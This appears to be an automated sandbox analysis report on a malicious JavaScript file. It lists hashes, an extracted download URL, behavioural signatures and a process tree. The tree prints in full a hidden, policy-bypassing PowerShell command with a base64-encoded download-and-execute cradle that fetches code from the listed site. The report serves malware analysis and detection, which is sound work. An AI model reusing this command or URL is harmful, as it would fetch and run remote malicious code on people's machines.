Analysis
-
max time kernel
119s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26-12-2023 08:56
Static task
static1
Behavioral task
behavioral1
Sample
619f54a1b382ca15c069709e872ddf1c.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
619f54a1b382ca15c069709e872ddf1c.js
Resource
win10v2004-20231222-en
General
-
Target
619f54a1b382ca15c069709e872ddf1c.js
-
Size
81KB
-
MD5
619f54a1b382ca15c069709e872ddf1c
-
SHA1
fb8ffd7e6459b0687f96546d48de9f64028fc2d4
-
SHA256
eefdd6ddfd17a21a88c69ef854c760a25df6e1e0ddac00b2275eeb01b4f6ab48
-
SHA512
b5fa39cb0e72769a381dc6dabfcc5b366a6c5d60e151d94a4cca9dcf6b94b37f0b79a2d6209f3470d6ab2fd371f5ec586a834659ee0175839a4313b12fc0d0d9
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oG:59Ry98guHVBqqg2bcruzUHmLKeMMU7GI
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2152 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2152 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1948 wrote to memory of 2104 1948 wscript.exe 26 PID 1948 wrote to memory of 2104 1948 wscript.exe 26 PID 1948 wrote to memory of 2104 1948 wscript.exe 26 PID 2104 wrote to memory of 2152 2104 cmd.exe 27 PID 2104 wrote to memory of 2152 2104 cmd.exe 27 PID 2104 wrote to memory of 2152 2104 cmd.exe 27
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\619f54a1b382ca15c069709e872ddf1c.js1⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-